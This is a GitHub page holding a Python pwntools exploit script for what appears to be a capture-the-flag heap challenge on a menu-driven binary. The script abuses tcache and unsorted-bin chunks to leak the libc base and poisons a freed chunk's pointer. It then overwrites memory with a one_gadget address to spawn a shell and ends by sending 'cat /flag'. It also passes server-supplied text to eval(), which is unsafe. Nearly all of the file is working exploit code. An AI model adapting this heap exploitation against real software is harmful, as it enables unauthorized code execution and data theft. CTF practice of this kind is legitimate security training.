-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathtest.py
executable file
·101 lines (75 loc) · 2.02 KB
/
test.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# expBy : @eastXueLian
# Debug : ./exp.py debug ./pwn -t -b b+0xabcd
# Remote: ./exp.py remote ./pwn ip:port
from pwn import *
io = remote("192.168.18.21", 9999)
# io = process("./pwn")
# libc = ELF("./libc.so.6", checksec=False)
# elf = ELF("./bflat", checksec=False)
context.log_level = "info"
def ru(a, drop=False):
return io.recvuntil(a, drop)
lg = lambda s_name, s_val: print("\033[1;31;40m %s --> 0x%x \033[0m" % (s_name, s_val))
rl = lambda a=False: io.recvline(a)
rn = lambda x: io.recvn(x)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda a, b: io.sendafter(a, b)
sla = lambda a, b: io.sendlineafter(a, b)
ia = lambda: io.interactive()
dbg = lambda text=None: gdb.attach(io, text)
i2b = lambda c: str(c).encode()
u32_ex = lambda data: u32(data.ljust(4, b"\x00"))
u64_ex = lambda data: u64(data.ljust(8, b"\x00"))
def cmd(choice):
ru(b"Your Choice: \n")
sl(i2b(choice))
def win_gift():
cmd(666)
ru(b"But,you have to win it by yourself\n")
sl(i2b(1))
for i in range(1000):
res = eval(ru(b"= ?", drop=True))
sl(i2b(res))
if i % 100 == 0:
lg(b"i", i)
ru(b"Now,you have earned your award!\n")
def add(size, data):
cmd(1)
ru(b"please tell me how much you want to have:\n")
sl(i2b(size))
ru(b"Content:\n")
s(data)
def delet(idx):
cmd(2)
ru(b"Please give me idx:\n")
sl(i2b(idx))
def edit(idx, data):
cmd(3)
ru(b"Please give me idx:\n")
sl(i2b(idx))
ru(b"What do you want?\n")
s(data)
def show(idx):
cmd(4)
ru(b"Please give me idx:\n")
sl(i2b(idx))
for i in range(8):
add(0x90, b"a")
add(0x90, b"b")
for i in range(8):
delet(i)
show(7)
ru(b"info:\n")
libc_base = u64_ex(ru(b"\n", drop=True)) - 0x1ECBE0
lg("libc_base", libc_base)
edit(6, p64(libc_base + 0x1E9000 - 0x80 * 15))
add(0x90, b"a")
# add(0x90, p64(0xDEADBEEF) * (0x88 // 8))
win_gift()
add(0x90, p64(libc_base + 0xE3AFE) * (0x88 // 8))
cmd(5)
sl(b"cat /flag")
ia()